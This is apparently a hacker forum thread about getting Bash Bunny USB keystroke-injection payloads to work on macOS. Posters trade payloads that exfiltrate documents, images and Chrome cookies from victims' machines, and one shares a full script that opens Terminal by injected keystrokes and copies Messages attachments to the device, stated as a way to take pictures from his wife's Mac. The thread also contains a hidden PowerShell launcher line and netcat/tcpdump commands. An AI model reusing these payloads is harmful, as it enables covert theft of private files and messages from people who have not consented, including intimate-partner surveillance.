OS X Payloads

[WiFiJuice]

Guys, what Bash Bunny payloads have you got any success with on OS X?

[Firestorm]

No. what is your problem with yours Bash Bunny.

[Opticon]

@WiFiJuice I've been at this for a long time, as I bought the BB when it was first released. However, the following payloads never worked for me, and I was constantly looking for feedback over at Github: MacReverseShell, MacGetUsers, MacPFDExfil, etc. However, the one that has worked, and is easily modifiable to grab files from multiple directories, is macinfograbber. Great payload and I tip my hat to @kmakblob for this. Any other questions, please feel free to hit me up anytime :-)

[couchTornado]

Granted this was my first attempt at running a payload from the BB on Mac OSX but even after choosing the correct ethernet device, the nmap payload failed because OSX requires root to run the OS fingerprinting functions. NMAP has been this way for a long time (even prior to the security upgrades introduced a couple of versions ago).

Working at an art school we run MacOS everywhere (80-90% of our machines across academic and administrative units)

I'll keep poking at it, but if anyone has an easy fix, I'm all ears.

[WiFiJuice]

Awesome work with the Macinfograbber :) Thanks @Opticon. Hope we will have more Mac OS X payloads working on the BB soon.  It's has a huge percentage of the operating system market share: http://gs.statcounter.com/os-market-share/all/united-states-of-america

 

 

[Opticon]

Thank you @WiFiJuice. Macinfograbber, after altering code parameters, will fetch any document you'd like. I have mine set to go to the Desktop, Documents, and Home directories, and exfiltrate DOC, DOCX, PDF, PNG, JPG, JPEG, MOV, XLS, XLSX and more! I've tested the rewrite on several Macs and don't you know- it works on them all!

However, @couchTornado has a valid point regarding NMAP and OSX. I'll start to work on something and share my results either here or on Github. Just a thought before I log off, but if NMAP can't be used, what if we just call upon something inherent to Terminal? Such as:

• Scan the available wireless networks: /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s

• Setup a network listener on port 2196 for testing: /usr/bin/nc -l 2196

• Capture some packets: tcpdump -nS

• Capture all the packets:tcpdump -nnvvXS

• Capture the packets for a given port: tcpdump -nnvvXs 548

These are just a couple of things to consider while I toil away with a proper OSX NMAP hack.

Cheers!

[WiFiJuice]

@Opticon do you mind sharing your payload? Mine didn't work... Have a Swedish keyboard, so used "QUACK SET_LANGUAGE se" on top, but it didn't do the trick...

[Opticon]

@WiFiJuice Not at all! Would you like me to post the code publicly, on this forum, Github etc...? Let me just go ahead and do all of the aforementioned, that way I'm not keeping secrets from anyone! 

[WiFiJuice]

3 hours ago, Opticon said:

@WiFiJuice Not at all! Would you like me to post the code publicly, on this forum, Github etc...? Let me just go ahead and do all of the aforementioned, that way I'm not keeping secrets from anyone! 

@Opticon just sent you a DM :)

[Opticon]

@WiFiJuice The DM has been sent and I hope you enjoy it! Let me know if there's anything you would add or subtract from the payload.

Cheers!

[Opticon]

For reasons unknown to myself, MacOS or OSX has been greatly overlooked where the Bash Bunny is concerned. Having extensive knowledge of the architecture to make an actual Mac exfiltration possible led me to this script. Previous deprecated versions of the original may exist, however, they were myopic in scope and failed upon execution. Allow me to introduce Mac Master Exfil, or MME 1.0, which I hope will guide other Mac enthusiasts to add to this project. It is currently pending approval at Github. DM me for the code. Thank you all :-)

[Opticon]

Well @WiFiJuice I'll get working on it. However, here's a pertinent question, what firmware are you currently using? I've found 1.2 to be the most reliable firmware for the Bash Bunny. I've had nothing but trouble with 1.3. Restores and switches that won't execute payloads etc. What are your thoughts? I invite the entire community @couchTornado @Firestorm @Sebkinne @Darren Kitchen et al to answer.

-Cheers

[Dave-ee Jones]

Please don't tag everyone like that, if they deem it important enough for them to give their answer (Sebkinne answers if no one else has, or if he wants to add to something or if he wants to confirm something - but Darren rarely does). Not to mention you left me out ... :(

I myself have had no problems with firmware 1.3, and most of the payload library works with 1.3, therefore not working with 1.2 very well. Not sure why you would be getting weird switch errors..

[Sebkinne]

Use 1.3

[WiFiJuice]

How can I make something like this without Powershell? I want it to print out commands from a .txt file or similar saved on the Bash Bunny, but in OS X instead of Windows:

QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"

 

 

[PoSHMagiC0de]

2 hours ago, WiFiJuice said:

How can I make something like this without Powershell? I want it to print out commands from a .txt file or similar saved on the Bash Bunny, but in OS X instead of Windows:

QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"

 

 

Use python.  Do not have the code off the top of my head right now but when I get around to it (too much at work right now and part of too many projects) I plan on making the BBTPS cross platform with the OSX and Linux agent parts being done in python.

 

Issue with the above is I know on Linux you need to be root or using sudo to mount a removable drive.  That is the reason I chose the network approach for the BBTPS so I do not have to worry about mounting anything on the victim.

 

 

[WiFiJuice]

The Swedish language file is wrong @Sebkinne for example it can't write out a "~" correctly and messes up my code... How can this be fixed?

 

 

[Opticon]

@WiFiJuice You bring up an excellent point, one that I would wished the developers would have anticipated. Hopefully, as you've addressed this problem before, they will look into resolving language files. Perhaps it's the reason my payload didn't work for you, but that's only speculation.

[RazerBlade]

2 hours ago, WiFiJuice said:

The Swedish language file is wrong @Sebkinne for example it can't write out a "~" correctly and messes up my code... How can this be fixed?

 

 

Im also using the swedish keyboard layout. As with my experience the language file works great on windows but as you said spells out the character wrong. 

[RazerBlade]

It appears that to type ~ on Mac with Swedish Pro layout which most Swedish user do, it's alt + ¨ which the mac interprets as ~. So the keyboard file has to be changed.

[WiFiJuice]

5 minutes ago, RazerBlade said:

It appears that to type ~ on Mac with Swedish Pro layout which most Swedish user do, it's alt + ¨ which the mac interprets as ~. So the keyboard file has to be changed.

Yes, that that little character is really important to be able to write out something like "~/Library/Application\\ Support/Google/Chrome/Default/Cookies"

[WiFiJuice]

This is the layout of the Swedish Pro Keyboard. The se.json file in https://github.com/hak5/bashbunny-payloads/tree/master/languages is corrupt. It can't write out the very important Tilde sign " ~ " nor can it write out a backslash " \ ". Can anyone please help out to fix this issue? I will donate $50 in BTC to the one that fixes this, as I really need my BB to work.

[quentin_lamamy]

I am actually work on OSX specific keyboard layout. At the moment to resolve keyboard issue on OSX sxitch to pc layout in keyboard setting

[ImInAjar]

 

@Opticon do you have a git repository with some of your modifications? Im working on modifying InfoGrabber to retrieve pictures send via text from my wife's mac before she has to return it to work, but I cant get the following to work:

QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \;

script dies at this line with output  find: -exec: no terminating ";" or "+"

cant find any documentation on what may be happening.

Any help would be great.

 

[ImInAjar]

1 minute ago, ImInAjar said:

 

@Opticon do you have a git repository with some of your modifications? Im working on modifying InfoGrabber to retrieve pictures send via text from my wife's mac before she has to return it to work, but I cant get the following to work:

QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \;

script dies at this line with output  find: -exec: no terminating ";" or "+"

cant find any documentation on what may be happening.

Any help would be great.

 

Full script:

#!/bin/bash
LED G R
ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E

lootdir=loot/MacLoot
mkdir -p /root/udisk/$lootdir

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 5000
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/images
QUACK ENTER
QUACK DELAY 500
QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \;
QUACK ENTER

# Sync filesystem
sync

# Green LED for finished
LED G

files=$(ls /Volumes/BashBunny/$lootdir/images/{*.jpg,*.jpeg,*.png} 2> /dev/null | wc -l)
files2=$(ls /Volumes/BashBunny/$lootdir/images/{*.jpg,*.jpeg,*.png} 2> /dev/null | wc -l)

if [ "$files" != "0" -o "$files2" != "0"]; then
  # Got spreadsheet files
  LED R B
else
  LED R
  # No spread sheets
fi

#Eject BB
QUACK diskutil unmount BashBunny; killall terminal